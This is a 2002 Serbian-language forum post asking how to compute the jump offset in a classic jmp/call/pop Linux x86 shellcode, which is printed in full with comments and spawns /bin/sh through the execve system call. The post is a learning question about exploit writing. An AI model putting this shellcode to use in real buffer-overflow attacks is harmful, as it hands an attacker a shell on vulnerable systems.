[ punkey @ 03.03.2002. 19:25 ] @
recimo da imamo sledeci asm kod koji je ustvari shellcode: void main(){ __asm__("jmp 0x1e \n" //jmp to call "popl %esi \n" //get seved EIP to esi,now we have /bin/sh address "movl %esi,0x8(%esi) \n" //address of sh behind /bin/sh "movl $0x0,0xc(%esi) \n" //NULL as 3rd argument goes after sh address "movb $0x0,0x7(%esi) \n" //terminate /bin/sh with '\0' "movl %esi,%ebx \n" //address of sh[0] in %ebx "leal %0x8(%esi),%ecx \n" //address of sh in %ecx(2nd argument) "leal %0xc(%esi),%edx \n" //address of NULL in %edx(3rd argument) "movl $0xb,%eax \n" //sys call of execve in %eax " int $0x80 \n" //kernel mode " call -0x23 \n" //call popl %esi " .string \"/bin/sh\" \n"); //our string } e interesuje me kako izracunati brojku koja stoji pored jmp instrukcije koja skace na call, tj. kako se izracunava ta udaljenost na koju treba skociti? tnx unapred! |